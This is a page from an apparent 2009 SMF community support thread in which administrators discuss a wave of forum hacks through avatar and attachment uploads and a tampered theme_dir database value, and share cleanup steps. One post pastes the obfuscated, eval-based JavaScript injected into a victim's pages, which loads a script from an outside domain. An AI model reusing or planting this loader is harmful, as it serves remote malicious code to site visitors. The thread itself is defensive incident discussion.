News:

Want to get involved in developing SMF, then why not lend a hand on our github!

Main Menu

Hacked, script injection

Started by vHawkeyev, May 01, 2009, 10:47:02 AM

Previous topic - Next topic

Agafonov

Quote from: Filipina on May 14, 2009, 12:05:54 AM
If I get hacked can't I just upload all the clean files from my forum and all will be fine?

According to my findings, simple overwriting files will not help.
You have to remove all files and folders except Settings.php and attachments/ (if no other used by your mods, I'm not sure).
This will make you sure that where is no hacker's code in your files.
But even then you have to alter database to clean spectial "theme_dir" value from "smf_themes" table that was used to break into.

Edvard

Again, I'd like to add that my forum was hacked several times in a short time span (a few days), even though I completely deleted the forum and replaced it by a clean backup. Somehow, either through the php-script or via the rootkit.hacktool on my admin-pc, the ftp server password was compromised, and the site was hacked again overnight.

So, if your site is hacked, make sure your admin-pc is virus and malware free. Then delete your whole forum (make a backup of the infected forum if you wish, I did so I could put non-infected avatars and attachments, as well as other changes, back on-line), change the ftp and mysql server passwords, and upload clean forum software.

And, the most important lesson I've learnt is: MAKE BACK-UPS! This will be the last time I have to resort to a backup made almost one and a half year ago. I suggest making back-ups every time you change some of the php or html files, before upgrades/updates, and generally often enough to ensure attachments and avatars won't be lost.

Tiribulus

#162
Quote from: Agafonov on May 14, 2009, 02:29:55 AM
<<< But even then you have to alter database to clean spectial "theme_dir" value from "smf_themes" table that was used to break into.

You're not saying that the mere presence of this value is bad right? Meaning there is a legitimate one that's supposed to be there correct?

stevefdl

I got hacked with a javascript between the head and body of my site. I tried re-installing, but nothing seems to work. Code is still there...anyone know if this is the same hack?

</head><script language=javascript><!--
(function(){var FopJ='var#20a#3d#22Scr#69p#74#45#6e#67in#65#22#2cb#3d#22Ve#72si#6f#6e(#29+#22#2c#6a#3d#22#22#2c#75#3dn#61vig#61tor#2euserAgent#3b#69f((u#2ein#64exOf(#22Win#22)#3e0)#26#26(u#2ein#64#65xOf(#22NT#206#22)#3c0#29#26#26(documen#74#2ecoo#6b#69e#2e#69ndexO#66(#22mi#65k#3d1#22)#3c#30)#26#26#28typ#65of(zrv#7at#73)#21#3dty#70#65of#28#22A#22)))#7bzr#76zts#3d#22#41#22#3be#76al(#22i#66#28window#2e#22+a#2b#22)j#3dj#2b#22+#61+#22#4dajor#22#2b#62#2ba+#22M#69#6eor#22#2b#62+a#2b#22Bu#69ld#22+b+#22#6a#3b#22)#3bdoc#75me#6et#2ewrite(#22#3cscript#20src#3d#2f#2fgu#6dblar#2ec#6e#2f#72s#73#2f#3fid#3d#22#2bj#2b#22#3e#3c#5c#2fscr#69pt#3e#22)#3b#7d';var uy5=FopJ.replace(/#/g,'%');var Bsiy=unescape(uy5);eval(Bsiy)})();
--></script>
<body>

Filipina

Quote from: Agafonov on May 14, 2009, 02:29:55 AM
Quote from: Filipina on May 14, 2009, 12:05:54 AM
If I get hacked can't I just upload all the clean files from my forum and all will be fine?

According to my findings, simple overwriting files will not help.
You have to remove all files and folders except Settings.php and attachments/ (if no other used by your mods, I'm not sure).
This will make you sure that where is no hacker's code in your files.
But even then you have to alter database to clean spectial "theme_dir" value from "smf_themes" table that was used to break into.

Ok thanks for the information. I did a search today of the main two user names being used in the attacks and the results are unbelievable. When you see the search results and site descriptions showing things like "poker" and "gaming" it must be too late for them. My registration will just remain closed until a patch comes out because I am not taking any chances. It is not only the infection itself, but I am sure Google will just blacklist your site once they crawl and find that mess. It is truly sad.

Kindred

Actually, the statement is slightly incorrect.

uploading a clean set of files *WILL* help and will solve your immediate problems with the forum.  It will not, however, close any backdoors or other exploits that the hacker may have added. THOSE other files are the ones you need to delete.
Слaва
Украинi

Please do not PM, IM or Email me with support questions.  You will get better and faster responses in the support boards.  Thank you.

"Loki is not evil, although he is certainly not a force for good. Loki is... complicated."

Jorin

Quote from: JBlaze™ on May 12, 2009, 04:29:52 PM
I have also created a topic on how to prevent being hacked.

http://www.simplemachines.org/community/index.php?topic=309717.0

Thank you very much. Is SimpleMachines actually working on a fix for this security problem? Don't want any details, just a simple "yes, should be online soon" or a "no, this cannot be solved on a SMF basis".  ;)

crash56

Quote from: nehcregit on May 15, 2009, 02:30:10 AM
Thank you very much. Is SimpleMachines actually working on a fix for this security problem? Don't want any details, just a simple "yes, should be online soon" or a "no, this cannot be solved on a SMF basis".  ;)

They're working on it.  Kindred posted that they're working on a fix.  It's on page 8 of this thread. 

No ETA yet. 

Jorin


Aleksi "Lex" Kilpinen

#169
Krisbarteo registered on my forum today,


krisbarteo - [email protected] - 94.142.129.147 -  Today at 12:58:32


The "Stop Spammer" -mod marked all profile details as spammer, and stopped krisbarteo from completing the registration. So I can say that mod is a good choice for protecting your forums as well ;)

http://custom.simplemachines.org/mods/index.php?mod=1547

Some additional info:
The hostname of krisbarteo seems to be the same as IP,
and I have a gender option on registration, and krisbarteo selected male ;D
Slava
Ukraini!


"Before you allow people access to your forum, especially in an administrative position, you must be aware that that person can seriously damage your forum. Therefore, you should only allow people that you trust, implicitly, to have such access." -Douglas

How you can help SMF

agridoc

#170
One important thing that I had not seen discussed is to find and delete the PHP file that is loaded by the injected script. It can be found if the base64 code is decoded http://www.motobit.com/util/base64-decoder-encoder.asp.

The longest path in the domain's dir is used and many garbage files are added there. I had to use SHELL to find and keep this file for examination, as there are file limitations in FTP and CP filemanager. The file can be decoded to see what else could have been done.

If there is no recent backup each file PHP has to be opened and the injected code be deleted.

I am looking for a cleaning script that would

- First ask for input of the string to search (the injected code).
- Search recursively the domain for the incidence of PHP files and build an array.
- Use this array to open and search each PHP file and, if found, delete the string (the injected code).

Such a cleaning script would be greatly appreciated, even by supporters.
  For Greek aeromodellers and our friends around the world  - Greek Button sets for SMF - Greeklish to Greek mod
Δeν αφιερώνω χρόνο για μηνύματα σε greeklish.

sponna

We got hit slightly differently it seems. The attacker managed to upload a file "attach.php" in the attachments directory together with the avatar exploit. He then created a htaccess file with a redirect to a file he either created or modified called readme_old. Somehow this combination created an iframe using our home page code but into which was called many different versions of drug selling stores. All of these urls were accessed from the attachments directory in the forum via the redirect in the htaccess file.

I'm still trying to work out what sequence of events lead to the compromise - but it was almost certainly via the avatar or attachment upload. What worries me is that we had "encrypt file extensions" enabled so not sure how he invoked the file remotely. For sure I'd like to catch up with him!

I only found one file (readme_old) with the base64 code so far.

Pretty crap situation, particularly as Google crawled the vast array of urls and indexed them - we knew something was wrong when our bandwidth went sky high.

Samker

I also find "KrisBarteo" in Member Base but it's look like that he doesn't success to hack us... At least I don't have anything unusual with my SCForum.

Can somebody please also check (and verify) is everything OK with Forum??


http://www.SCforum.info


Thanks in Advance!

S.
Samker's Computer Forum - SCforum.info

Sarge

Quote from: Samker on May 15, 2009, 04:13:26 PM
Can somebody please also check (and verify) is everything OK with Forum??

Your forum looks fine to me.

    Please do not PM me with support requests unless I invite you to.

http://www.zeriyt.com/   ~   http://www.galeriashqiptare.net/


Quote
<H> I had zero posts when I started posting

Dzonny

Quote from: Sarge on May 15, 2009, 04:18:02 PM
Quote from: Samker on May 15, 2009, 04:13:26 PM
Can somebody please also check (and verify) is everything OK with Forum??

Your forum looks fine to me.
I Agree... ;)

Samker

Thank you guys...  :D

I'm now wondering why he doesn't success with hack since it's registered from 09. May 2009. and I know about this "hole" only for few hours??

I have tight settings (normal for Security Forum which I run) maybe I could help other with protections... I mean we could compare settings and find differences between installed mods, enabled features etc. ??

Best Regards,

S.

Samker's Computer Forum - SCforum.info

agridoc

Quote from: Samker on May 15, 2009, 04:13:26 PMCan somebody please also check (and verify) is everything OK with Forum??

It might look OK but be infected. Go with FTP and check some PHP files. If there is no added code, it's rather not infected. Also check your error log.
  For Greek aeromodellers and our friends around the world  - Greek Button sets for SMF - Greeklish to Greek mod
Δeν αφιερώνω χρόνο για μηνύματα σε greeklish.

Samker

Quote from: agridoc on May 15, 2009, 05:06:14 PM
Quote from: Samker on May 15, 2009, 04:13:26 PMCan somebody please also check (and verify) is everything OK with Forum??

It might look OK but be infected. Go with FTP and check some PHP files. If there is no added code, it's rather not infected. Also check your error log.

I was already make a double check of all mentioned things and everything seem Ok.

Thanks for reply.
Samker's Computer Forum - SCforum.info

M-DVD

Quote from: Agafonov on May 14, 2009, 02:16:53 AM
Quote from: M-DVD on May 13, 2009, 11:23:37 PM
3.- There is another problem, how the spammers run this file once uploaded?

Read http://www.simplemachines.org/community/index.php?topic=307717.msg2056804#msg2056804 and http://www.simplemachines.org/community/index.php?topic=307717.msg2057480#msg2057480


THANKS Agafonov, without your info, I never could find the trick  >:(

Quote from: Agafonov on May 12, 2009, 06:02:29 PM
How the value of theme_dir appeared in smf_themes table - is the main question.

The guy is brillant. I found the way, just because already knew that exists and search in the site.

Quote from: Samker on May 15, 2009, 04:32:36 PM
I'm now wondering why he doesn't success with hack since it's registered from 09. May 2009. and I know about this "hole" only for few hours??

Perhaps because the guy has been busy :P

Tiribulus

Quote from: M-DVD on May 15, 2009, 05:53:32 PM
<<< I found the way, just because already knew that exists and search in the site. >>>

How would ya like to a be a sterling citizen and share that with us? :)

Advertisement: